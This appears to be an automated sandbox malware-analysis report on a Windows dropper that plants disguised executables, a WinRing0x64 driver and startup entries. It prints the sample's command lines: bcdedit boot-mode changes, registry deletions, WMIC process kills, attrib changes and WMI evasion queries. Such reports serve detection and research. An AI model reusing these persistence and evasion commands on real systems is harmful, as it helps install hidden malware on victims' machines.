sericewatchdogcRunning as cad-simulatorcadaRunning by servicemode{}The app is already running.. exitingCan't elevate processcant_elevateStartbuild IntelSvc {}adminbuildmajorminorservice_packplatformidsuitetypeWindows {}, {}, {}, {}, {}, {}, {}windowslanguageEnvironment {}envsessidselectedrestartupdatedboot_modeadminserviceLaunch parameters: {}, {}, {}, {}, {}, {}, as {}, is running {}paramsWow64DisableWow64FsRedirectionWow64RevertWow64FsRedirectionbcdedit.exe/deletevalue safebootCan't run BCDEdit for clearing boot moderegistering tray window classreg_tray_wnd_classmenu_servicetray_tipRunning with no UIno_uichannelCan't create interprocess communication {}create_ipcExit, 0xGUI objects {}gui_objsminutesSpentpartnCountpartnCountLimWarnpartnCountSuspWarnpartnCountLimtimeLimWarntimeLimSuspWarntimeLimprlSesLimOutprlSesLimInfileTransfermsg1IntervalshowPPAfterSessionautoUpdatedownloadSA_CLOSEbtn_cancelupdate_requestbtn_update_noneed_okupdate_noneedSave ID to fileid.txtCan't create/open file id.txtidtxt_openidrightsAdmin wnd: {}, {}.: ID 8.8.8.8sa_ipsa_portrouter_iprouter_portproxy_ipproxy_port(la
                            Source: Start.cmd.0.drBinary or memory string: %WINDIR%\System32\bcdedit.exe /deletevalue safeboot>nul 2>nul

                            Boot Survival

                            barindex
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\Public\cmdow.exeJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\Public\RtkAudio.exeJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\Public\WinRing0x64.sysJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\Public\screen.exeJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\Public\IntelSvc.exeJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\d.txtJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\d.txtJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d.txtJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\screen.exeCode function: 18_2_0040EE9C LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,18_2_0040EE9C
                            Source: C:\Users\user\Desktop\K4gsPJGEi4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX

                            Malware Analysis System Evasion

                            barindex
                            Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Service WHERE name like &apos;ServiceNetwork&apos;
                            Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Service WHERE name like &apos;loadhost Service&apos;
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Service WHERE name like &apos;loadhost&apos;
                            Source: C:\Windows\SysWOW64\timeout.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Service WHERE name like &apos;ServiceNetwork&apos;
                            Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Service WHERE name like &apos;ServiceNetwork&apos;
                            Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Service WHERE name like &apos;loadhost Service&apos;
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Service WHERE name like &apos;ServiceNetwork&apos;
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Service WHERE name like &apos;loadhost Service&apos;
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Service WHERE name like &apos;Intel(R) Utiliti&apos;
                            Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\Public\cmdow.exeJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Windows\SysWOW64\en\Ri.aviJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\Public\WinRing0x64.sysJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\WinRing0x64.sysJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Tweaker\IntelS.jpgJump to dropped file
                            Source: C:\Users\user\Desktop\K4gsPJGEi4.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\IntelSvc.exeJump to dropped file
                            Source: C:\Users\user\Desktop\K4gsPJGEi4.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RtkAudio.txtJump to dropped file
                            Source: C:\Users\user\Desktop\K4gsPJGEi4.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Systemfont.txtJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\Public\IntelSvc.exeJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\ProgramData\IntelSvc.exeJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Windows\SysWOW64\en\Au.aviJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\tv_x86.exeJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Tweaker\cmdo.jpgJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Tfile\IntelSvc.exeJump to dropped file
                            Source: C:\Users\user\Desktop\K4gsPJGEi4.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\cmdow.exeJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Windows\SysWOW64\en\In.aviJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\Public\RtkAudio.exeJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Windows\SysWOW64\en\Sy.aviJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Tweaker\Systemfo.jpgJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Windows\SysWOW64\en\cm.aviJump to dropped file
                            Source: C:\Users\user\Desktop\K4gsPJGEi4.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\WinRing0x64.txtJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Systemfont.exeJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RtkAudio.exeJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Windows\SysWOW64\RuntimeBroker.exeJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Tweaker\Aud.jpgJump to dropped file
                            Source: C:\Users\user\Desktop\K4gsPJGEi4.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\OneDrive\fontdrvhots.exeJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Tweaker\Ring0x.jpgJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\ProgramData\cmdow.exeJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Tfile\RtkAudio.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\screen.exeAPI coverage: 2.4 %
                            Source: C:\Windows\SysWOW64\timeout.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                            Source: C:\Windows\SysWOW64\timeout.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Users\user\AppData\Local\Temp\screen.exeCode function: 18_2_004024C1 FindFirstFileA,FindNextFileA,FindClose,18_2_004024C1
                            Source: C:\Users\user\AppData\Local\Temp\screen.exeCode function: 18_2_004030D0 FindFirstFileA,FindNextFileA,strlen,strlen,18_2_004030D0
                            Source: K4gsPJGEi4.exe, 00000000.00000002.2167132442.0000000001172000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _VMware_8j
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information queried: ProcessInformation
                            Source: C:\Users\user\AppData\Local\Temp\screen.exeCode function: 18_2_004044CF LoadLibraryA,GetProcAddress,18_2_004044CF

                            HIPS / PFW / Operating System Protection Evasion

                            barindex
                            Source: Yara matchFile source: Process Memory Space: K4gsPJGEi4.exe PID: 3652, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Start.cmd, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\two.cmd, type: DROPPED
                            Source: C:\Users\user\AppData\Local\Temp\screen.exeCode function: memset,memset,GetWindowsDirectoryA,strlen,strlen,FindWindowA,GetWindowThreadProcessId,OpenProcess,CloseHandle,CloseHandle,PostMessageA,EnumWindows,memset,memset,MultiByteToWideChar,CloseHandle,memset,FindWindowA,GetWindowThreadProcessId,PostMessageA,memset,CreateProcessA,FreeLibrary, Explorer.exe18_2_00404738
                            Source: C:\Users\user\AppData\Local\Temp\screen.exeCode function: memset,memset,GetWindowsDirectoryA,strlen,strlen,FindWindowA,GetWindowThreadProcessId,OpenProcess,CloseHandle,CloseHandle,PostMessageA,EnumWindows,memset,memset,MultiByteToWideChar,CloseHandle,memset,FindWindowA,GetWindowThreadProcessId,PostMessageA,memset,CreateProcessA,FreeLibrary, Explorer.exe18_2_00404738
                            Source: C:\Users\user\Desktop\K4gsPJGEi4.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Start.cmd" "Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\Start.cmd"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe query "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe C:\Windows\System32\find.exe "0x0" Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\est1.vbs" Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe C:\Windows\System32\timeout.exe /t 1Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c type "C:\Users\user\AppData\Local\Temp\Start.cmd"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Vnoad.vbs" Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe C:\Windows\System32\timeout.exe /t 1Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe C:\Windows\System32\timeout.exe /t 1Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001Jump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\est1.cmd" Jump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\two.cmd" Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\screen.exe "C:\Users\user\AppData\Local\Temp\screen.exe" win hide ititle "cod2"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo "C:\Users\user\AppData\Local\Temp" 2>NUL"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe C:\Windows\System32\findstr.exe /i /c:"Local" Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo "C:\Users\user" 2>NUL"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe C:\Windows\System32\findstr.exe /i /c:"'" Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\screen.exe "C:\Users\user\AppData\Local\Temp\screen.exe" win hide ititle "cod2"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe C:\Windows\System32\timeout.exe /t 1Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe C:\Windows\System32\timeout.exe /t 1Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe C:\Windows\System32\timeout.exe /t 1Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe query "HKCU\Software\Microsoft\Windows"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe C:\Windows\System32\attrib.exe -h -r -s "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\*.*"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe C:\Windows\System32\attrib.exe -h -r -s "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.*"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe delete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers" /va /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe delete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers" /va /f /reg:64Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe delete "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers" /va /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe delete "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers" /va /f /reg:64Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where (name="RtkAudio.exe") get commandline Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /i /c:"RtkAudio"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where "name like '%RtkAudio.exe%'" Call TerminateJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo "C:\Users\user\AppData\Local\Temp" 2>NUL"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo "C:\Users\user" 2>NUL"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where "name like '%palemoon.exe%'" Call TerminateJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where "name like '%screen.exe%'" Call TerminateJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where "name like '%choice.exe%'" Call TerminateJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where "name like '%fontdrvhots.exe%'" Call TerminateJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where "name like '%tv_x86.exe%'" Call TerminateJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe C:\Windows\System32\attrib.exe -h -r -s "C:\Users\user\AppData\Local\Temp\*.*"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe C:\Windows\System32\attrib.exe -h -r -s "C:\Users\user\AppData\Local\Temp\Tweaker\*.*"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe C:\Windows\System32\attrib.exe -h -r -s "C:\Windows\SysWOW64\en\*.*"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe C:\Windows\System32\attrib.exe -h -r -s "C:\Users\Public\*.*"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe C:\Windows\System32\attrib.exe -h -r -s "C:\ProgramData\*.*"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /i /c:"RtkAudio"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo "C:\Users\user\AppData\Local\Temp" 2>NUL"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo "C:\Users\user" 2>NUL"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where "name like '%palemoon.exe%'" Call TerminateJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where (name="RtkAudio.exe") get commandline Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where "name like '%fontdrvhots.exe%'" Call TerminateJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo "C:\Users\user" 2>NUL"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe C:\Windows\System32\timeout.exe /t 1Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo "C:\Users\user" 2>NUL"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where "name like '%palemoon.exe%'" Call TerminateJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where (name="RtkAudio.exe") get commandline Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo "C:\Users\user" 2>NUL"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe C:\Windows\System32\timeout.exe /t 1Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe C:\Windows\System32\attrib.exe -h -r -s "C:\Windows\SysWOW64\en\*.*"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
